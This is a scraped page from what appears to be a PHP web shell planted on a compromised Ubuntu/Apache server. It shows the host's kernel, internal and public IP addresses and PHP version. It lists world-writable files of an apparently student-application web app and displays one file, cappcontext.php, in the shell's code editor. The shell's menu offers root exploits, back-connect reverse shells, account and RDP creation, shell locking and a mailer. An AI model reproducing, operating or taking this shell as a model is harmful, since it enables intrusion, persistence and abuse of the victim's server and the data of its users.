Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.105.101
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
dud /
adm /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormReportPOSTOFFIC...
19.27
KB
-rwxrwxrwx
applicationFormReportSBM.php
8.41
KB
-rwxrwxrwx
caccesscontext.php
1.24
KB
-rwxrwxrwx
cappcontext.php
2.66
KB
-rwxrwxrwx
code39.php
6.38
KB
-rwxrwxrwx
coutput.php
1.76
KB
-rwxrwxrwx
crequestbroker.php
2.49
KB
-rwxrwxrwx
csessions.php
514
B
-rwxrwxrwx
cuser.php
3.41
KB
-rwxrwxrwx
customappcontext.php
2.35
KB
-rwxrwxrwx
dropdown.php
844
B
-rwxrwxrwx
format.php
7.43
KB
-rwxrwxrwx
fpdf_protection.php
5.61
KB
-rwxrwxrwx
getdata.php
1.06
KB
-rwxrwxrwx
getnumword.php
7.15
KB
-rwxrwxrwx
json.php
33.2
KB
-rwxrwxrwx
kusphdadm.php
22.17
KB
-rwxrwxrwx
kusphdadm_02012019.php
17.81
KB
-rwxrwxrwx
kusphdadm_19082019.php
17.88
KB
-rwxrwxrwx
mregistry.php
3.83
KB
-rwxrwxrwx
re_rigistration.php
7.38
KB
-rwxrwxrwx
report_bulk_applications.php
24.21
KB
-rwxrwxrwx
report_bulk_applications_19082...
23.5
KB
-rwxrwxrwx
report_hall_ticket.php
11.31
KB
-rwxrwxrwx
reportapplicationform - Copy.p...
19.59
KB
-rwxrwxrwx
reportapplicationform.php
23.92
KB
-rwxrwxrwx
rotation.php
596
B
-rwxrwxrwx
saveApplication.php
8.91
KB
-rwxrwxrwx
saveRerigistration.php
10.87
KB
-rwxrwxrwx
student.php
14.89
KB
-rwxrwxrwx
student_19082019.php
14.75
KB
-rwxrwxrwx
student_24092018.php
13.3
KB
-rwxrwxrwx
subfeedetl.php
3.39
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cappcontext.php
<?php require_once("cconfig.php"); require_once( APP_DB_G . "/adodb.inc.php"); require_once( APP_DB_G . "/tohtml.inc.php"); require_once( APP_DB_G . "/toexport.inc.php"); require_once( APP_SRC_G . "/crequestbroker.php"); require_once( APP_SRC_G . "/csessions.php"); require_once( APP_SRC_G . "/coutput.php"); require_once( APP_SRC_G . "/cuser.php"); class CApplicationContext { public $mobj_config; #Config Object public $mobj_db; #Adodb Object public $mobj_orb; #Request Broker - Singleton Class with static functions public $mobj_user; #User Object public $mobj_data; #Data public $mobj_output; #Output stream public $main_src; #public $mobj_logger; #Logger stream function __construct() { } function Initialize() { # all the contained object creations happen here and not in the constructor # this is to avoid exceptions during object creation # 06. Input - Init $this->mobj_data = $_REQUEST; //var_dump($_REQUEST); # 01. Create the Config Object $this->mobj_config = new CConfig( isset($this->mobj_data["dbg"]), $this->mobj_data["cdb"]); # 02. Create the DB Object $this->mobj_db = adoNewConnection("mysqli"); # by default we connect to mysql $this->mobj_db->debug = $this->mobj_config->mbool_debug; $lbool_res = $this->mobj_db->Connect($this->mobj_config->mstr_host, $this->mobj_config->mstr_user, $this->mobj_config->mstr_password, $this->mobj_config->mstr_db); # 03. Create the Request Broker $this->mobj_orb = CRequestBroker::GetInstance(); /* Actions to be registered in mregistry.php */ # 04. Sessions CSessions::Initialize(); # 07. Output - Init $this->mobj_output = new COutput(); $this->mobj_output->Initialize(); # 05. User $this->mobj_user = CSessions::GetUser(); $this->mobj_user = CSessions::GetUser(); //$sess_obj=NEW CSessions(); // $this->mobj_user = $sess_obj->GetUserManual(); if (!isset($this->mobj_user)) $this->mobj_user = new CUser($this); # to get the main source $main_src_obj=(explode("/",$_SERVER["REQUEST_URI"])); $this->main_src=substr($_SERVER['SCRIPT_FILENAME'],0,strlen($_SERVER['SCRIPT_FILENAME'])-7); //$this->main_src=$_SERVER["DOCUMENT_ROOT"]."/".$main_src_obj[1]; } function __destruct() { # though php closes the db, it is good practice to do it ourselves explicitely once # $this->mobj_db->Close(); unset($this->mobj_db); unset($this->mobj_config); } } ?>
Close